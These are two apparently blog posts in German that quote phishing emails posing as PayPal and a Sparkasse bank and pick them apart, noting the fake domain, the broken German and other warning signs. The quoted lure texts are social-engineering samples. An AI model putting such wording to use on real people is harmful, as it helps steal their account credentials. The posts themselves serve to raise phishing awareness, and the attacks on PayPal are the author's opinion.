Bitte unterstützen Sie uns dabei, Ihr PayPal-Konto wieder in Sicherheit zu bringen. Bis dahin haben wir den Portal zu Ihrem PayPal-Kundenkonto vorübergehend eingeschränkt.

So so, „in Sicherheit bringen“. :mrgreen:

Wo liegt das Sachverhalt?

Bei Ihrer letzten Meldung sind uns auffällige Vorgänge aufgefallen.

Aha! :mrgreen:

Was mache ich umgehend?

Bitte verifizieren Sie sich über folgenden Button durch einen Abgleich Ihrer Informationen als rechtmäßiger Inhaber. Nachfolgend können Sie Ihr Paypal-Konto wieder uneingeschränkt gebrauchen:

Hier klicken

Der Link geht natürlich nicht zur Website in der Domain von PayPal, sondern in die deutlich weniger Vertrauen erweckende Domain payalready (punkt) com, die…

$ whois payalready.com | grep '^Creation'
Creation Date: 2016-02-11T22:22:18Z

…gerade erst vor neun Tagen eingerichtet wurde. Natürlich anonym, über einen Whois-Anonymisierer aus dem trockenen, warmen Australien.

Was immer man dort an Daten eingibt, geht direkt an Kriminelle.

Mit freundlichen Grüßen

Ihr Team von PayPal Deutschland

Wenn das die Freundlichkeit ist…

Sie möchten mit uns Kontakt aufnehmen?
Unsere Kundenhotline erreichen Sie unter 0180 500 88 xx
(Mo.-Fr. 8.00 bis 21.30 Uhr und Sa.-So. 9.00 bis 19.30 Uhr. Für Anrufe aus dem Festnetz fallen maximal 14 Cent/Min. an, aus Mobilfunknetzen sind es maximal 42 Cent/Min.)

Hier finden Sie weitere Informationen:
Online-Shops | Sicherheit | Passwort vergessen

Oh, toll: Links auf „weitere Informationen“, die gar nicht erst funktionieren.

Helfen Sie uns, Paypal noch besser, einfacher, übersichtlicher und sicherer zu machen.

Gern doch, PayPal. Fang doch mal damit an, deine richtigen Mails digital zu signieren und deine Kunden immer wieder darüber aufzuklären, was eine digitale Signatur ist und wie man diese überprüft! Damit könntest du dem dummen Phishing, wie es auch hier vorliegt, einfach nach und nach den Boden unter den Füßen wegziehen. Und das Beste daran: Für diesen signifikanten Zugewinn an Sicherheit musst du praktisch kein Geld investieren. Die Software, die du dafür brauchst, ist Frei und seit zwei Jahrzehnten für jeden verfügbar, der sie nutzen will. Der einzige Grund, weshalb du das nicht machst, PayPal, kann nur sein, dass dir die Schäden bei deinen Kunden scheißegal sind. Du, PayPal, du bist die Kriminalität, denn du arbeitest ihr seit Jahren zu.

Copyright © 1999–2012 PayPal. Alle Rechte vorbehalten. PayPal (Europe) S.à r.l. et Cie, S.C.A., Société en Commandite par Actions. Eingetragener Firmensitz: 22–24 Boulevard Royal, L-2449 Luxembourg RCS Luxembourg B 118 349.

Oh, das „Copyright“ auf diese Drecksmail ging nur bis 2012… :D

Ach! Entf!

Diese Spam der Gattung „schlecht gemachtes, mieses Phishing“ ist ein Zustecksel meines Lesers S.W.

Sparkasse Online-Konto Aktualisierung

Freitag, 18. September 2015

Ein Qualitätsbetreff und dazu Qualitätsdeutsch:

Sehr geehrter Kunde,

Wir sind derzeit die Aktualisierung unserer Datenbank [sic!] und alle Online-Banking-Konten müssen aktualisiert und. [sic! Satz endet hier] Um können wieder aktiviert werden, auch weiterhin diesen Vorteil zu nutzen, bitten wir Sie Ihre Daten in den folgenden Link, um zu bestätigen:

Sparkasse Online-Konto Aktualisierung: Klicken Sie hier

Dank für Ihre Mitarbeit und Verständnis.

Mit freundlichen Grüßen.
Ihre Sparkasse Kundenservice.

Überflüssig zu erwähnen…

  1. …dass eine Sparkasse nicht solche E-Mails schreibt.
  2. …dass eine Sparkasse in jeden Brief und in jede E-Mail hineinschreiben würde, welche Sparkasse sie ist, denn es gibt derer viele.
  3. …dass niemand einen namentlich bekannten Kunden mit „Sehr geehrter Kunde“ ansprechen würde, wenn er den Kunden auch behalten möchte.
  4. …dass sehr viele Bankkunden mehrere Konten haben und dass deshalb in jeder Korrespondenz einer Bank die Kontonummer erwähnt würde, auf die sich der Vorgang bezieht.
  5. …dass die Website der richtigen Sparkasse nicht im Upload-Verzeichnis eines von Kriminellen gecrackten WordPress-Blogs aus den USA liegt.
  6. …dass es für jeden nur denkbaren Zweck vollkommen sinnlos ist, wegen einer technischen Änderung auf seiten einer Bank dieser Bank jede Menge Daten erneut angeben zu müssen, die diese Bank schon lange kennt und in vielfachen Sicherungskopien vorliegen hat.
  7. …dass der Linktext „Klicken Sie hier“ ein unzweifelhaftes Kennzeichen für Spam oder völlig unseriöse Werbung ist und immer alle Alarmglocken schrillen lassen sollte¹.

Aber was erzähle ich! Leider wird es trotzdem wieder nach Versand einiger Millionen von diesen Phishing-Spams zehn bis fünfzehn naive Menschen geben, die darauf reinfallen und damit Verbrechern ihr Konto für allerlei „Geschäfte“ zur Verfügung stellen. Oder vielleicht auch hundert bis hundertfünfzig. Oder sogar noch mehr. Das genaue Ausmaß dieses Wahnsinns kennen wohl nur die Banken und die Polizeien. Die Tatsache, dass die Phishing-Spams für Bankkunden heute zum größten Teil noch so genau dumm sind, wie sie es vor zehn Jahren auch schon waren, belegt nur eines: Dass diese Spams immer noch erfolgreich genug sind, so dass es sich für die Verbrecher schlicht nicht lohnt, ihre Verfahren zu verbessern.

Denn die geben sich keine Mühe. Sonst könnten sie ja gleich arbeiten gehen.

¹Führt bei mir direkt in den Spamordner. Fehlerkennungen: keine. Kein Mensch würde so einen dummen Linktext schreiben, wenn er sich auch nur eine Spur Gedanken macht, wie das beim Empfänger wirkt. Nur Werber und Spammer schreiben so.